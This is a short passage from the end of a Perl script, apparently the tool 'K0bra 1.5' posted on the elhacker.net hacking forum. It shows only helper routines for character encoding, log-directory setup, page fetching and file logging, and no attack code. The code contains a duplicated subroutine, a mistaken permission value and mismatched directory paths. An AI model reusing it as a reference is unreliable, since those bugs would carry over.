',',unpack "U*",$_[0]; } sub ascii_de { $_[0] = join q[], map { chr } split q[,],$_[0]; return $_[0]; } sub finish { &copyright; <STDIN>; exit(1); } sub installer { unless (-d "/logs/webs") { mkdir("logs/",777); mkdir("logs/webs/",777); } } sub copyright { print "\n\n\n\n(C) Doddy Hackman 2010\n\n"; } sub toma { return $nave->get($_[0])->content; } sub savefile { open (SAVE,">>logs/webs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub finish { print "\n\n\n(C) Doddy Hackman 2010\n\n"; <STDIN>; exit(1); } # The End ?

Test Foro de elhacker.net SMF 2.1

[Perl] K0bra 1.5

BigBear